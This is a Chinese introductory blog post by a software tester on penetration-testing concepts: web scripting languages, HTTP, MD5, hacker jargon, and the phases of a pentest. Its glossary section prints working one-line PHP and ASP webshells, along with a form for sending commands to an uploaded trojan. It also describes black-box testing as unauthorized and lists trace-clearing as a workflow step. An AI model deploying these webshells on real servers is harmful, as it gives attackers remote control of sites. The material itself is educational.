本文由软件测试工程师菜鸟小白分享,主要介绍了渗透测试中的基础概念,包括脚本语言(ASP, PHP, JSP)、HTML、HTTP协议、内容管理系统(CMS)、MD5散列以及渗透测试相关术语,如肉鸡、webshell、提权和旁站等。此外,还探讨了黑盒测试和白盒测试的区别,并概述了渗透测试的流程。
点击上方「蓝字」关注我们
各位新老朋友们:
大家好,我是菜鸟小白。欢迎大家关注“菜鸟小白的学习分享”公众号,菜鸟小白作为一名软件测试工程师,会定期给大家分享一些测试基础知识、测试环境的搭建和python学习分享,另外还有给大家推荐一些好用的工具和网站。当然,如果大家有什么需求,或者有什么想要和大家一起分享的,可以私信菜鸟小白哦~
想要快速查看历史文章的小伙伴,可以关注公众号,在菜单栏中的【历史文章】查看;想要查看分类文章的,可以在菜单栏中的【python学习】、【测试专题】和【工具推荐】专栏进行查看。
本公众号倾注了菜鸟小白大量时间心血,如果你觉得有所收获,还请多多转发宣传,让我有不竭的动力坚持下去。
说来也惭愧,菜鸟小白已经干了三年安全产品的测试,但是对于渗透测试都不曾好好了解,一直停留在基础功能测试和自动化测试的摸索上。正好我们组内在组织渗透测试的全套课程学习,将会从最基础的内容开始学起,学习的内容菜鸟小白也会整理出来,一起分享。
今天我们一起来看看一些基础概念吧。
基础概念
1、脚本(asp、php、jsp)
ASP:ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标记语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也可以包含文本、HTML(包括相关的客户端脚本)和com组件调用。
PHP:PHP即“超文本预处理器”,是一种通用开源脚本语言。PHP是在服务器端执行的脚本语言,与C语言类似,是常用的网站编程语言。
JSP:JSP(全称JavaServer Pages)是由Sun Microsystems公司主导创建的一种动态网页技术标准。JSP部署于网络服务器上,可以响应客户端发送的请求,并根据请求内容动态地生成HTML、XML或其他格式文档的Web网页,然后返回给请求者。
2、html(css、js、html)
html:HTML称为超文本标记语言,是一种标识性的语言。它包括一系列标签.通过这些标签可以将网络上的文档格式统一,使分散的Internet资源连接为一个逻辑整体。HTML文本是由HTML命令组成的描述性文本,HTML命令可以说明文字,图形、动画、声音、表格、链接等。
3、HTTP协议
HTTP:http是一个简单的请求-响应协议,它通常运行在TCP之上。它指定了客户端可能发送给服务器什么样的消息以及得到什么样的响应。请求和响应消息的头以ASCII码形式给出;而消息内容则具有一个类似MIME的格式。
4、CMS(B/S)
CMS:内容管理系统(content management system,CMS),我们这边一般使用的B/S架构,也就是浏览器访问的方式。另外还有一种C/S架构,就是通过应用程序的访问方式。
5、MD5
MD5:MD5信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。渗透测试中一般密码的解码需要使用。
6、其它概念
肉鸡:被黑客入侵并被长期驻扎的计算机或服务器
抓鸡:利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为
webshell:通过web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制
漏洞:硬件、软件、协议等可利用的安全缺陷,可能被攻击者利用,对数据进行篡改、控制等。
一句话木马:通过向服务器提交一句简短的代码,配合本地客户端实现webshell功能的木马。
举例:
<%eval request("pass")%>
<%execute(request("pass"))%>
其中request("pass")接收客户端提交的数据,pass为执行命令的参数值。
eval/execute,函数执行客户端命令的内容
又如:PHP的一句话木马
<?php eval($_POST[123]);?>
下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改查等各种功能。
<form method=post action=http://木马地址>
<textarea name=123>
//这里写PHP代码
phpinfo();
</textarea>
<input type=submit>
</form>
提权:操作系统低权限的账户将自己提升为管理员权限使用的方法。
后门:黑客为了对主机进行长期的控制没在机器上种植的一段程序或留下的一个“入口”
跳板:使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息
旁站:同一个物理服务器下搭建的多个网站。如:服务器下有三个网站A、B、C,B和C就是A的旁站。
旁站入侵:即同服务器下的网址入侵,入侵之后可以通过提权跨目录等手段拿到目标网址的权限。常见的旁站查询工具有:WebRobot、御剑、明小子和web在线查询等。
C段入侵:即同C段下服务器入侵。如目标IP为192.168.1.253入侵192.168.1.*的任意一台机器,然后利用一些黑客工具嗅探获取在网上传输的各种信息。常用的工具有:Cain(Windows)、Sniffit(UNIX)、Snoop、tcpdump、dsniff等
渗透测试
黑盒测试:在未授权的情况,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能存在的安全风险。黑盒测试考验的是综合能力(OS、database、script、code、思路和社工)。
白盒测试:从内部发起,偏向于代码审计
APT攻击:Advanced Persistent Threat,高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式,具有以下特点:
1.极强的隐蔽性
2.潜伏期长,持续性强
3.目标性强
渗透测试的特点
充满挑战与刺激;
思路和经验积累往往决定成败;
渗透测试的流程
渗透测试:更全面的找出服务器的问题,更倾向于保护
明确目标——信息收集——漏洞探测——漏洞验证——信息分析——获取所需——信息整理——形成报告
明确目标:范围、规则、需求
信息收集:基础、系统、应用、版本(版本漏洞)、服务、人员(密码破解)、防护
漏洞探测:系统漏洞、webserver漏洞、web应用漏洞、其它端口服务漏洞、通信安全
漏洞验证:自动化验证、手工验证、试验验证、登录猜测、业务漏洞验证、公开资源的利用
信息分析:精准打击、绕过防御机制、定制攻击路径、绕过检测机制、绕过代码
获取所需:实施攻击、获取内部信息、进一步渗透、持续性存在*、清理痕迹
信息整理:整理渗透工具、整理收集信息、整理
形成报告:按需整理、补充介绍、修补建议
往期推荐
python也能玩视频剪辑!moviepy操作记录总结
太好用!图片转文字没有python环境也能运行了!!!
通过server酱实现定时推送天气情况,再不用担心你的糊涂蛋女友忘带伞了~~
六十来行python代码完成一个文件分类器
媳妇儿喜欢玩某音中的动漫特效,那我就用python做一个图片转化软件。
关注菜鸟小白的学习分享 更多精彩等你发现!
一个人的学习——孤单
一群人的学习——幸福
喜欢我就点亮小花吧
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
